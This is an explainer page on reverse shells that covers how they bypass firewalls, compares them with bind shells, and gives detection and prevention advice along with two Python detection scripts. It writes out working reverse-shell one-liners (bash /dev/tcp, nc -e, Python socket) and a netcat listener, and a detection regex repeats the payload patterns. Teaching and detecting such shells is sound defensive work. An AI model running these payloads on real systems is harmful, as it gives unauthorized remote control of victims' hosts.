Reverse Shell

TL;DR: Reverse Shell

A reverse shell, also known as a connect-back shell, is when a compromised system connects to the attacker and gives them a live command-line session.

Why does this matter?

  • Reverse shells can bypass firewalls since most firewalls block incoming connections but allow outgoing ones.
  • Attackers gain real control because they can run commands just like they are logged in directly.
  • Reverse shells are very common since they are a standard step after an attacker exploits a system.

Imagine it this way: instead of the attacker trying to get in, they trick the server into reaching out to them.

What Is a Reverse Shell?

A reverse shell is a remote shell where the victim’s computer starts the connection to the attacker’s computer.

Normally, your computer starts the connection, like when you visit a website. With a reverse shell, this is reversed. After the attacker finds a way to run code, the server connects back to the attacker.

An easy way to remember it:

  • Bind shell: You try to connect to the server. If a firewall blocks you, you cannot get through.
  • Reverse shell: The server connects to you. Since outgoing connections are usually allowed, you can answer and take control.

Why Reverse Shells Matter

Security teams usually focus on defenses like firewalls, load balancers, and limiting ports. These work until an attacker manages to run code inside the system.

When that happens, the reverse shell becomes the attacker’s main way to stay in.

Why this is dangerous:

  • Outbound traffic is trusted.

    Firewalls often allow outgoing traffic on ports like 80 or 443 for updates and APIs. Reverse shells can hide in this allowed traffic.

  • Attackers can maintain access.

    Even if the original security hole is fixed, an active shell can still let attackers control the system.

  • It enables lateral movement.

    With a shell, attackers can look around the internal network, steal passwords, and move to other computers. One vulnerability can quickly lead to the whole environment being compromised.

How a Reverse Shell Works

A reverse shell has two main parts: the listener and the payload.

1. The Listener (Attacker Side)

The attacker uses a program that waits for connections. Netcat is a common tool for this.

nc -lvnp 4444

This command tells the attacker’s computer to listen on port 4444 and wait for a connection.

2. The Payload (Victim Side)

After finding a vulnerability like Remote Code Execution, the attacker runs a command on the victim’s server to open a shell and send it back.

bash -i >& /dev/tcp/attacker-ip/4444 0>&1

This command starts a bash shell and sends all input and output to the attacker’s computer.

3. The Connection

The victim’s server starts an outgoing connection. The firewall sees this as normal and allows it. The attacker’s listener accepts the connection, giving the attacker a live shell on the server.

At this stage, the attacker has full interactive control over the server.
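To show what the connection stage looks like from the defender's side, here is an added example (not code from the original page) that parses constructed `ss -tnp`-style socket listing lines and flags established outbound connections that are either owned by a shell or interpreter process or go to a destination outside an egress allowlist. The sample lines, the allowlist, the process-name list and the ephemeral-port heuristic for "this host initiated the connection" are all assumptions made for the example.

```python
import ipaddress
import re

# Constructed sample of `ss -tnp` output for illustration; not captured from a real host.
SAMPLE_SS_OUTPUT = """\
State  Recv-Q Send-Q Local Address:Port  Peer Address:Port   Process
ESTAB  0      0      10.0.0.5:443        203.0.113.7:51234   users:(("nginx",pid=812,fd=12))
ESTAB  0      0      10.0.0.5:49152      10.0.0.1:4444       users:(("bash",pid=1337,fd=1))
ESTAB  0      0      10.0.0.5:49153      198.51.100.20:443   users:(("python3",pid=901,fd=3))
ESTAB  0      0      10.0.0.5:49154      192.0.2.10:443      users:(("curl",pid=955,fd=5))
"""

# Process names that should not normally own an outbound socket on a web server (assumption).
SHELL_LIKE = {"bash", "sh", "dash", "zsh", "python", "python3", "perl", "nc", "ncat"}

# Egress allowlist as (network, port) pairs; constructed for the example.
EGRESS_ALLOWLIST = [
    (ipaddress.ip_network("192.0.2.0/24"), 443),  # e.g. the package mirror or API endpoint
]

# Linux's default ephemeral port range starts at 32768; a local port in that range is
# the usual sign that this host initiated the connection (heuristic, not proof).
EPHEMERAL_START = 32768

LINE_RE = re.compile(
    r"^(?P<state>\S+)\s+\d+\s+\d+\s+(?P<local>\S+)\s+(?P<peer>\S+)\s+"
    r'users:\(\("(?P<proc>[^"]+)",pid=(?P<pid>\d+),fd=\d+\)\)'
)


def parse_ss(text):
    """Turn ss-style lines into connection records; header and unparseable lines are skipped."""
    conns = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        _, local_port = m.group("local").rsplit(":", 1)
        peer_ip, peer_port = m.group("peer").rsplit(":", 1)
        conns.append({
            "state": m.group("state"),
            "local_port": int(local_port),
            "peer_ip": ipaddress.ip_address(peer_ip),
            "peer_port": int(peer_port),
            "proc": m.group("proc"),
            "pid": int(m.group("pid")),
        })
    return conns


def is_outbound(conn):
    return conn["local_port"] >= EPHEMERAL_START


def is_allowed(conn):
    return any(conn["peer_ip"] in net and conn["peer_port"] == port
               for net, port in EGRESS_ALLOWLIST)


def find_suspicious(text):
    """Return (pid, process, peer, reasons) for each established outbound connection worth a look."""
    findings = []
    for c in parse_ss(text):
        if c["state"] != "ESTAB" or not is_outbound(c):
            continue
        reasons = []
        if c["proc"] in SHELL_LIKE:
            reasons.append("shell-like process owns socket")
        if not is_allowed(c):
            reasons.append("destination not in egress allowlist")
        if reasons:
            findings.append((c["pid"], c["proc"], f'{c["peer_ip"]}:{c["peer_port"]}', reasons))
    return findings


if __name__ == "__main__":
    for pid, proc, peer, reasons in find_suspicious(SAMPLE_SS_OUTPUT):
        print(f"pid {pid} ({proc}) -> {peer}: {'; '.join(reasons)}")
```

On the sample data the inbound nginx connection on port 443 is ignored, the `curl` call to the allowlisted mirror passes, and both the `bash` session to port 4444 and the `python3` socket to an unlisted host are reported. The allowlist check is the part that scales: a server that only ever needs to reach a handful of destinations gives every other outbound connection a reason to be investigated, whichever port it uses.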

Common Reverse Shell Examples

Attackers and ethical hackers adjust their approach based on what tools are available on the target system.

Bash (Common on Linux)

bash -i >& /dev/tcp/10.0.0.1/4444 0>&1

Netcat

Used when Netcat is available on the target machine.

nc -e /bin/sh 10.0.0.1 4444

Python

Python is very common on modern servers.

python -c 'import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("10.0.0.1",4444));
os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);
subprocess.call(["/bin/sh","-i"]);'

Reverse Shell vs Bind Shell

Knowing the difference between reverse shells and bind shells helps with defending networks.

Feature                Bind Shell              Reverse Shell
Connection direction   Attacker to Victim      Victim to Attacker
Firewall impact        Often blocked           Often allowed
Network requirements   Direct access needed    Works through NAT and firewalls
Typical use case       Internal networks       Real-world attacks

Who Uses Reverse Shells?

  • Penetration testers use reverse shells to prove that a vulnerability can lead to full system compromise.
  • Red teams use reverse shells to test how well outbound traffic is controlled.
  • Malicious actors use reverse shells to deploy ransomware, steal data, or move further into a network.
  • System administrators rarely use reverse shells for remote access. They usually prefer secure SSH tunnels.

Detection and Prevention

Stopping reverse shells takes several layers of defense.

  • Outbound traffic filtering

    Servers should not have open access to the internet. Limit which destinations and ports they can use.

  • Behavior monitoring

    A web server spawning a shell process, such as /bin/bash or cmd.exe, is highly suspicious.

  • Reduce the attack surface.

    Remove unused tools like Netcat, compilers, and extra interpreters from production systems.

  • Remote Code Execution (RCE)
  • Bind Shell
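The behaviour-monitoring point above can be turned into a concrete host-side check. The following is an added example, not code from the original page: it parses a constructed `ps -eo pid,ppid,comm,args` snapshot, walks each process's ancestry, and flags shells that sit under a web server process, command lines carrying the patterns the page's own payload examples use, and shells whose standard input is a network socket (as `readlink /proc/<pid>/fd/0` would show). The process table, the fd-0 mapping, and the web-server and shell name lists are assumptions for the example.

```python
import re

# Constructed `ps -eo pid,ppid,comm,args` output; not taken from a real host.
SAMPLE_PS = """\
  PID  PPID COMMAND  ARGS
    1     0 systemd  /sbin/init
  812     1 nginx    nginx: master process /usr/sbin/nginx
  813   812 nginx    nginx: worker process
  820     1 php-fpm  php-fpm: master process (/etc/php/fpm/php-fpm.conf)
  821   820 php-fpm  php-fpm: pool www
 1337   821 sh       sh -c bash -i >& /dev/tcp/10.0.0.1/4444 0>&1
 1338  1337 bash     bash -i
 2001     1 sshd     /usr/sbin/sshd -D
 2002  2001 bash     -bash
"""

# Constructed view of what readlink("/proc/<pid>/fd/0") would return for each pid (assumption).
SAMPLE_FD0 = {1337: "/dev/null", 1338: "socket:[48213]", 2002: "/dev/pts/0"}

SHELLS = {"sh", "bash", "dash", "zsh"}
WEB_SERVERS = {"nginx", "apache2", "httpd", "php-fpm", "node", "java"}

# Command-line fragments seen in the reverse-shell one-liners on this page; constructed list.
MARKER_RE = re.compile(r"/dev/tcp/|/dev/udp/|\bnc\b.*\s-e\b|os\.dup2")

PS_LINE_RE = re.compile(r"^\s*(?P<pid>\d+)\s+(?P<ppid>\d+)\s+(?P<comm>\S+)\s+(?P<args>.*)$")


def parse_ps(text):
    """Map pid -> {ppid, comm, args}; the header line has no numeric pid and is skipped."""
    procs = {}
    for line in text.splitlines():
        m = PS_LINE_RE.match(line)
        if not m:
            continue
        procs[int(m.group("pid"))] = {
            "ppid": int(m.group("ppid")),
            "comm": m.group("comm"),
            "args": m.group("args").strip(),
        }
    return procs


def ancestors(procs, pid):
    """Command names of the parent chain, nearest first; stops at pid 0 or an unknown parent."""
    chain, seen = [], set()
    cur = procs[pid]["ppid"]
    while cur in procs and cur not in seen:
        seen.add(cur)
        chain.append(procs[cur]["comm"])
        cur = procs[cur]["ppid"]
    return chain


def assess(procs, fd0):
    """Return pid -> list of reasons for every process that trips at least one rule."""
    findings = {}
    for pid, p in procs.items():
        reasons = []
        if p["comm"] in SHELLS and any(a in WEB_SERVERS for a in ancestors(procs, pid)):
            reasons.append("shell spawned under web server")
        if MARKER_RE.search(p["args"]):
            reasons.append("reverse-shell pattern in command line")
        if p["comm"] in SHELLS and fd0.get(pid, "").startswith("socket:"):
            reasons.append("shell stdin is a network socket")
        if reasons:
            findings[pid] = reasons
    return findings


if __name__ == "__main__":
    for pid, reasons in assess(parse_ps(SAMPLE_PS), SAMPLE_FD0).items():
        print(f"pid {pid}: {'; '.join(reasons)}")
```

The ancestry rule is the durable one: the interactive `bash -i` child (pid 1338) has an innocent-looking command line, yet it is reported because its parent chain leads to `php-fpm` and its stdin is a socket rather than a terminal. The administrator's login shell under `sshd` (pid 2002) trips none of the rules, which is the distinction a production alert needs to make.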

FAQ: Reverse Shell

Is a reverse shell illegal?

Reverse shells are legal only if you use them on systems you own or have clear permission to test. Using them without permission is illegal.

Why do firewalls allow reverse shells?

Firewalls are built to block incoming threats and usually trust outgoing traffic. Reverse shells take advantage of this.

Can an antivirus detect reverse shells?

Sometimes. Antivirus software that uses signatures can find known shell programs, but fileless shells made with Bash or Python are much harder to detect.

What is the difference between a reverse shell and a webshell?

A webshell is used through a browser and usually stays on the system, but has limited features. A reverse shell gives a live, interactive command-line session.
